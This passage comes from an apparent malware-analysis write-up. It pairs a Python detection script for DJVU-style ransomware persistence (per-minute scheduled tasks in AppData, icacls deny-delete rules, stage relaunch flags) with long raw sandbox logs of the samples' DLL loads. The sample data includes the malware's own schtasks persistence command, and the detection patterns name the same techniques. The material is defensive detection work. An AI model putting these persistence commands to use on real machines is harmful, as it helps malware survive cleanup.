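    r'Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe --Task',
    r'Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"',
    r'Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'Source: C:\Program Files\Vendor\setup.exe Process created: C:\Windows\System32\schtasks.exe /create /sc daily /tn "VendorUpdate" /tr "C:\Program Files\Vendor\update.exe"',
]

# Stage flags the sample passes to itself (from the "Command line argument" entries above).
DJVU_FLAGS = {"--admin", "--task", "--autostart", "--fornetres", "--service"}

_PROC_RE = re.compile(
    r'^Source: (?P<parent>.+?) Process created: (?P<image>\S+?\.exe)\s*(?P<cmdline>.*)$',
    re.IGNORECASE,
)
# Anything under C:\Users\<name>\AppData\ is writable by that user without elevation.
_USER_WRITABLE = re.compile(r'\\users\\[^\\]+\\appdata\\', re.IGNORECASE)


def tokens(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping quoted paths as single tokens."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def _arg(toks: List[str], flag: str) -> str:
    """Value following a switch such as /tn, or '' if the switch is absent."""
    low = [t.lower() for t in toks]
    i = low.index(flag) if flag in low else -1
    return toks[i + 1] if 0 <= i < len(toks) - 1 else ""


def check_schtasks(image: str, toks: List[str]) -> Optional[Dict[str, str]]:
    """schtasks /create with a minute cadence whose target lives under a user's AppData."""
    low = [t.lower() for t in toks]
    if not image.lower().endswith("schtasks.exe") or "/create" not in low:
        return None
    name, target = _arg(toks, "/tn"), _arg(toks, "/tr")
    if _arg(toks, "/sc").lower() == "minute" and _USER_WRITABLE.search(target):
        return {"rule": "schtasks_minute_appdata", "artifact": name,
                "detail": f'task "{name}" runs {target} every {_arg(toks, "/mo") or "1"} minute(s)'}
    return None


def check_icacls(image: str, toks: List[str]) -> Optional[Dict[str, str]]:
    """icacls /deny against Everyone (*S-1-1-0) that strips delete (DE) or delete-child (DC)
    rights: the ransomware protecting its own drop folder from cleanup."""
    low = [t.lower() for t in toks]
    if not image.lower().endswith("icacls.exe") or "/deny" not in low:
        return None
    i = low.index("/deny")
    if i == 0 or i + 1 >= len(toks):
        return None
    folder, ace = toks[i - 1], toks[i + 1]
    if ace.startswith("*S-1-1-0:") and re.search(r'\b(DE|DC)\b', ace):
        return {"rule": "icacls_deny_everyone_delete", "artifact": folder,
                "detail": f"Everyone denied delete on {folder} via {ace}"}
    return None


def check_relaunch(image: str, toks: List[str]) -> Optional[Dict[str, str]]:
    """Self-relaunch carrying one of the stage flags the binary parses."""
    flags = sorted({t for t in toks if t.lower() in DJVU_FLAGS})
    if not flags:
        return None
    return {"rule": "djvu_relaunch_flags", "artifact": " ".join(flags),
            "detail": f"{image} relaunched with {' '.join(flags)}"}


CHECKS = (check_icacls, check_relaunch, check_schtasks)


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run every check over every 'Process created' line; lines that do not parse are skipped."""
    findings = []
    for line in lines:
        m = _PROC_RE.match(line)
        if not m:
            continue
        toks = tokens(m["cmdline"])
        for check in CHECKS:
            hit = check(m["image"], toks)
            if hit:
                findings.append({**hit, "parent": m["parent"], "image": m["image"]})
    return findings


def remediation(findings: List[Dict[str, str]]) -> List[str]:
    """Undo commands for what scan() found. Kill the processes first; the deny ACE has to be
    removed before the drop folder can be deleted. Switches are standard icacls/schtasks ones."""
    cmds = []
    for f in findings:
        if f["rule"] == "schtasks_minute_appdata":
            cmds.append(f'schtasks /Delete /TN "{f["artifact"]}" /F')
        elif f["rule"] == "icacls_deny_everyone_delete":
            cmds.append(f'icacls "{f["artifact"]}" /remove:d *S-1-1-0')
    return cmds


if __name__ == "__main__":
    hits = scan(SAMPLE_LINES)
    for f in hits:
        print(f'[{f["rule"]}] {f["parent"]} -> {f["detail"]}')
    print("\n".join(remediation(hits)))
```

The icacls check keys on the well-known Everyone SID rather than on the localized group name, and the schtasks check requires both a minute cadence and a user-writable target, so a legitimate per-minute task from Program Files or a daily task from AppData does not fire on its own; tune those two conditions to the environment rather than loosening the SID match.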
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: taskschd.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: xmllite.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: taskschd.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: xmllite.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: drprov.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: ntlanman.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: davclnt.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: davhlpr.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: browcli.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: mskeyprotect.dll
